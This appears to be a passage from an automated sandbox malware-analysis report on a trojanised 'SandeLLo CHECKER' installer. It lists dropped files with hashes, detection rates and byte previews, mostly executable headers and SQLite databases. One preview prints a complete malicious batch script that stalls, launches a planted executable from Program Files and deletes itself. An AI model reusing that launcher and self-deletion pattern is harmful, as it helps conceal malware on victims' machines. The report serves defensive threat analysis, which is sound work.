                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\shi436E.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5038592
                                                                                                                      Entropy (8bit):6.043058205786219
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                                      MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                                      SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                                      SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                                      SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):250
                                                                                                                      Entropy (8bit):5.238787771219104
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:hCijTg3Nou1SV+DEi4/eWU/ZGvKOZG1wkn23fuK:HTg9uYDEi4/eD/oDfmK
                                                                                                                      MD5:C3263AA17EB043CD892AE8BA5306CAE8
                                                                                                                      SHA1:B4D29EF13337A3CD6EFB750838648955FC04DA6C
                                                                                                                      SHA-256:9092CE341A143E404E65E8187F6A71894CFDA6DA12926B4D32F63DF1AB3A38CD
                                                                                                                      SHA-512:B9B68D3E1E98D2DBB71C2A7E32E45B3C9E334FCC7FD8D1285705177A9F74B77AD4F71A4510F9F7787206ED4D515631F60B23CA8482D54492EF427108FD90786F
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\uMu0Nxwczl.bat"

                                                                                                                      C:\Users\user\AppData\Local\Temp\yxcSNKiGi6

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1251, Revision Number: {FAF1FEAC-2FC7-4585-9A19-0ECE4CC93372}, Number of Words: 0, Subject: SandeLLo CHECKER, Author: LIMITED LIABILITY COMPANY "SANDELLO", Name of Creating Application: SandeLLo CHECKER, Template: ;1049, Comments: CS CheckCheat, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Apr 1 17:11:28 2024, Number of Pages: 200
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4085760
                                                                                                                      Entropy (8bit):6.581204593384424
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:WQ5+qotJCxKoibHCNbH4d5+u+Tx5KzEKrbsUT1wZK2Pfth1Yz5nsWIGvjlIlyX9H:otFHCNbHXjf1Y5GCaSqgEgv
                                                                                                                      MD5:E47C6582751CDC22D8C0EEAC60DE6D0B
                                                                                                                      SHA1:4C057D98754B09C95FCAE46162673D1B241CCEA4
                                                                                                                      SHA-256:C645A247C399AE2E8CCF8F826415E7287B52080FCAE3DAC203E7E543FE792CCB
                                                                                                                      SHA-512:2E2DC24E4CC1314F17506C0007F1E5C1200AF1A2B14820968E7A1019C29B60913701BEB5498A6C13E7CEF938E98EFA464B1CAE2F5A8CC59C493CAEBFD158DA5B
                                                                                                                      Malicious:false
                                                                                                                      Preview:......................>...................?...................................^.......v.......W................................................................................... ...|...}...~..............................._...`...a...b...c...d...e...f...g...h...i...j...)...*...+...,...-......./...0...1...2...3.......................................................................................................................................................................................................................................-...;....................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...<...:.../...0...1...2...3...4...5...6...7...8...9.......D...W...=...>...?...@...A...B...C...G...E...F...T...H...I...J...K...L...M...N...O...P...Q...R...S...]...U...V.......X...Y...Z...[...\...............`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                      C:\Users\user\Desktop\AOGsABiv.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):89600
                                                                                                                      Entropy (8bit):5.905167202474779
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                      MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                      SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                      SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                      SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                      C:\Users\user\Desktop\BXyiPEuJ.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38400
                                                                                                                      Entropy (8bit):5.699005826018714
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                      MD5:87765D141228784AE91334BAE25AD743
                                                                                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\ClgJzaDG.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):41472
                                                                                                                      Entropy (8bit):5.6808219961645605
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\GKQhrBJx.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):64000
                                                                                                                      Entropy (8bit):5.857602289000348
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\JrPikvxc.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32256
                                                                                                                      Entropy (8bit):5.631194486392901
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\LMwQZDoR.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):294912
                                                                                                                      Entropy (8bit):6.010605469502259
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                      C:\Users\user\Desktop\MAAYLQkP.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):34816
                                                                                                                      Entropy (8bit):5.636032516496583
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\OWmHElNj.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):39936
                                                                                                                      Entropy (8bit):5.629584586954759
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                      MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                      SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                      SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                      SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\OfhhMrNQ.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38400
                                                                                                                      Entropy (8bit):5.699005826018714
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                      MD5:87765D141228784AE91334BAE25AD743
                                                                                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\SEFybwug.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):50176
                                                                                                                      Entropy (8bit):5.723168999026349
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\SFtfhzmX.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):294912
                                                                                                                      Entropy (8bit):6.010605469502259
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                      C:\Users\user\Desktop\UplOiJFY.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38912
                                                                                                                      Entropy (8bit):5.679286635687991
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\UvPgJftz.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):70144
                                                                                                                      Entropy (8bit):5.909536568846014
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                      C:\Users\user\Desktop\XaQepXPR.log

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):89600
                                                                                                                      Entropy (8bit):5.905167202474779
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                      MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                      SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                      SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
